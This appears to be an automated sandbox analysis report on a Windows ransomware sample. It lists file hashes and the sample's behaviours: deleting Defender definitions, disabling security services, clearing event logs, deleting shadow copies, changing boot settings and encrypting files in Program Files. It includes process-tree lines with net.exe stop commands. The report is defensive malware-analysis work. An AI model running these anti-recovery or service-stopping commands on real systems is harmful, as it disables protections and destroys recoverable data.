Resubmissions
12-01-2022 20:48
220112-zlnz9adhf2 1012-01-2022 19:37
220112-yb5pksdgc6 1012-01-2022 19:25
220112-x5evksdgdl 1012-01-2022 16:50
220112-vb8jpadcc4 10Analysis
-
max time kernel
122s -
max time network
122s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
12-01-2022 16:50
Static task
static1
Behavioral task
behavioral1
Sample
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
Resource
win10-en-20211208
General
-
Target
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
-
Size
2.6MB
-
MD5
47f540350b1d360403225d146cc7fbb8
-
SHA1
43ad25b99cb47c7367b1703315402bb9e4970590
-
SHA256
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf
-
SHA512
91387685946beb65cddbc62b19102a1135511563bd84f24cacc402a1e5a1afb750887fa9d50e7120acd23ae27af53669a45fc48363c000b7f2ffb777036019ce
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 2124 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 2060 bcdedit.exe 2084 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exedescription ioc process File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR32F.GIF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_Cjq7i5-85uM0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\TAB_ON.GIF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_Emf4H2gsN9Y0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_up.png cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\license.html.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_h2gxVkSe8gY0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\es-ES\msadcor.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02126_.WMF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_qT_6RMGyFS40.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WITHCOMP.DPV.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_Vc7l7GUTGk40.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Anchorage.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P__gKENxS6lK80.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\2d.x3d.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_P7UElgM63i80.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\PULQOT98.POC.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_o7j6sCY8xaE0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Internet Explorer\en-US\jsprofilerui.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02285_.WMF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_dPVTZJcQdKI0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE03331_.WMF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_K2Um2-Zvk4k0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Flow.xml.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_tCbX-LnIX4k0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\IPSEventLogMsg.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\System\fr-FR\wab32res.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_top.png cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\17.png cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tokyo.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_Dmvddsi-j5s0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\css\RSSFeeds.css cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\groove.net\ManagedObjects\SignedManagedObjects.cer.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_Xa3rNeMhGos0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_gFp2Lz3D6qc0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\settings.html cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145895.JPG.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_FjrUu8kA9GA0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-2.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_cRh6jGYF6sI0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Windows Journal\fr-FR\jnwdui.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\logo.png cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\en-US\msadcfr.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Perspective.eftx.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_DuQa_nCrD7E0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14516_.GIF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P__IHG07kjmUw0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\shadowonlyframe_videoinset.png cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\InitializeHide.txt.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_jIqAC-agpbw0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-modules-appui.xml.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_6azglXMnpKY0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\9.png cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00705_.WMF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_pICAV3dOpms0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ADD.GIF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_Ntk3WJ_hUGE0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00160_.GIF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_mMPJoetjasQ0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0281630.WMF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_-r2y-V3WxFo0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02617_.WMF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_4brTOgnSmu40.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Windows Media Player\es-ES\WMPDMC.exe.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\gadget.xml cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Spelling.api.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_9G5URH2EE1Q0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yekaterinburg.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_Wt5E9D_hG-k0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\PROOF\MSWDS_EN.LEX.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_bmAUTjpA3FU0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099168.JPG.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_1MOin5TwB7g0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFNOT.CFG.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_QOV0js0kd-80.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_AutoMask.bmp.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_r4xQ9KVnuRM0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\hwrdeslm.dat cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationUp_ButtonGraphic.png cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\javafx.properties.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_BkQA5DL5iO40.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_top_right.png cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Help\en_US\Adobe Reader\9.0\helpmap.txt cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107490.WMF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_0PAHV9iP9kA0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GROOVE_COL.HXC.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_xFDAs7LR4Ec0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightYellow.css.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_klC0-99jnMg0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationRight_ButtonGraphic.png cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Center.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_IUtZ4Slu9ZA0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Windows Media Player\ja-JP\wmlaunch.exe.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\css\settings.css cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_increaseindent.gif.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_qBA47-oe0ZA0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_double.png cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_single_bkg.png cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Flow.eftx.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_GWe7mxBjEow0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD10256_.GIF.W-efvxcJ8hnBgHGc5gCLNb_79z2waueHP3FzO8yRD4P_MwcJqvAbEvM0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 516 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.execce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exepid process 2160 powershell.exe 2244 powershell.exe 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 1960 wevtutil.exe Token: SeBackupPrivilege 1960 wevtutil.exe Token: SeSecurityPrivilege 1080 wevtutil.exe Token: SeBackupPrivilege 1080 wevtutil.exe Token: SeSecurityPrivilege 1312 wevtutil.exe Token: SeBackupPrivilege 1312 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1112 wmic.exe Token: SeSecurityPrivilege 1112 wmic.exe Token: SeTakeOwnershipPrivilege 1112 wmic.exe Token: SeLoadDriverPrivilege 1112 wmic.exe Token: SeSystemProfilePrivilege 1112 wmic.exe Token: SeSystemtimePrivilege 1112 wmic.exe Token: SeProfSingleProcessPrivilege 1112 wmic.exe Token: SeIncBasePriorityPrivilege 1112 wmic.exe Token: SeCreatePagefilePrivilege 1112 wmic.exe Token: SeBackupPrivilege 1112 wmic.exe Token: SeRestorePrivilege 1112 wmic.exe Token: SeShutdownPrivilege 1112 wmic.exe Token: SeDebugPrivilege 1112 wmic.exe Token: SeSystemEnvironmentPrivilege 1112 wmic.exe Token: SeRemoteShutdownPrivilege 1112 wmic.exe Token: SeUndockPrivilege 1112 wmic.exe Token: SeManageVolumePrivilege 1112 wmic.exe Token: 33 1112 wmic.exe Token: 34 1112 wmic.exe Token: 35 1112 wmic.exe Token: SeIncreaseQuotaPrivilege 460 wmic.exe Token: SeSecurityPrivilege 460 wmic.exe Token: SeTakeOwnershipPrivilege 460 wmic.exe Token: SeLoadDriverPrivilege 460 wmic.exe Token: SeSystemProfilePrivilege 460 wmic.exe Token: SeSystemtimePrivilege 460 wmic.exe Token: SeProfSingleProcessPrivilege 460 wmic.exe Token: SeIncBasePriorityPrivilege 460 wmic.exe Token: SeCreatePagefilePrivilege 460 wmic.exe Token: SeBackupPrivilege 460 wmic.exe Token: SeRestorePrivilege 460 wmic.exe Token: SeShutdownPrivilege 460 wmic.exe Token: SeDebugPrivilege 460 wmic.exe Token: SeSystemEnvironmentPrivilege 460 wmic.exe Token: SeRemoteShutdownPrivilege 460 wmic.exe Token: SeUndockPrivilege 460 wmic.exe Token: SeManageVolumePrivilege 460 wmic.exe Token: 33 460 wmic.exe Token: 34 460 wmic.exe Token: 35 460 wmic.exe Token: SeIncreaseQuotaPrivilege 460 wmic.exe Token: SeSecurityPrivilege 460 wmic.exe Token: SeTakeOwnershipPrivilege 460 wmic.exe Token: SeLoadDriverPrivilege 460 wmic.exe Token: SeSystemProfilePrivilege 460 wmic.exe Token: SeSystemtimePrivilege 460 wmic.exe Token: SeProfSingleProcessPrivilege 460 wmic.exe Token: SeIncBasePriorityPrivilege 460 wmic.exe Token: SeCreatePagefilePrivilege 460 wmic.exe Token: SeBackupPrivilege 460 wmic.exe Token: SeRestorePrivilege 460 wmic.exe Token: SeShutdownPrivilege 460 wmic.exe Token: SeDebugPrivilege 460 wmic.exe Token: SeSystemEnvironmentPrivilege 460 wmic.exe Token: SeRemoteShutdownPrivilege 460 wmic.exe Token: SeUndockPrivilege 460 wmic.exe Token: SeManageVolumePrivilege 460 wmic.exe Token: 33 460 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 1740 wrote to memory of 1544 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1740 wrote to memory of 1544 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1740 wrote to memory of 1544 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1544 wrote to memory of 556 1544 net.exe net1.exe PID 1544 wrote to memory of 556 1544 net.exe net1.exe PID 1544 wrote to memory of 556 1544 net.exe net1.exe PID 1740 wrote to memory of 676 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1740 wrote to memory of 676 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1740 wrote to memory of 676 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 676 wrote to memory of 576 676 net.exe net1.exe PID 676 wrote to memory of 576 676 net.exe net1.exe PID 676 wrote to memory of 576 676 net.exe net1.exe PID 1740 wrote to memory of 1424 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1740 wrote to memory of 1424 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1740 wrote to memory of 1424 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1424 wrote to memory of 856 1424 net.exe net1.exe PID 1424 wrote to memory of 856 1424 net.exe net1.exe PID 1424 wrote to memory of 856 1424 net.exe net1.exe PID 1740 wrote to memory of 1668 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1740 wrote to memory of 1668 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1740 wrote to memory of 1668 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1668 wrote to memory of 1828 1668 net.exe net1.exe PID 1668 wrote to memory of 1828 1668 net.exe net1.exe PID 1668 wrote to memory of 1828 1668 net.exe net1.exe PID 1740 wrote to memory of 1132 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1740 wrote to memory of 1132 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1740 wrote to memory of 1132 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1132 wrote to memory of 916 1132 net.exe net1.exe PID 1132 wrote to memory of 916 1132 net.exe net1.exe PID 1132 wrote to memory of 916 1132 net.exe net1.exe PID 1740 wrote to memory of 812 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1740 wrote to memory of 812 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1740 wrote to memory of 812 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 812 wrote to memory of 1996 812 net.exe net1.exe PID 812 wrote to memory of 1996 812 net.exe net1.exe PID 812 wrote to memory of 1996 812 net.exe net1.exe PID 1740 wrote to memory of 1956 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1740 wrote to memory of 1956 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1740 wrote to memory of 1956 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1956 wrote to memory of 1236 1956 net.exe net1.exe PID 1956 wrote to memory of 1236 1956 net.exe net1.exe PID 1956 wrote to memory of 1236 1956 net.exe net1.exe PID 1740 wrote to memory of 1872 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1740 wrote to memory of 1872 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1740 wrote to memory of 1872 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1872 wrote to memory of 2008 1872 net.exe net1.exe PID 1872 wrote to memory of 2008 1872 net.exe net1.exe PID 1872 wrote to memory of 2008 1872 net.exe net1.exe PID 1740 wrote to memory of 1660 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 1740 wrote to memory of 1660 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 1740 wrote to memory of 1660 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 1740 wrote to memory of 1060 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 1740 wrote to memory of 1060 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 1740 wrote to memory of 1060 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 1740 wrote to memory of 548 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 1740 wrote to memory of 548 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 1740 wrote to memory of 548 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 1740 wrote to memory of 892 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 1740 wrote to memory of 892 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 1740 wrote to memory of 892 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 1740 wrote to memory of 1736 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 1740 wrote to memory of 1736 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 1740 wrote to memory of 1736 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 1740 wrote to memory of 776 1740 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:556
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:576
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1424 -
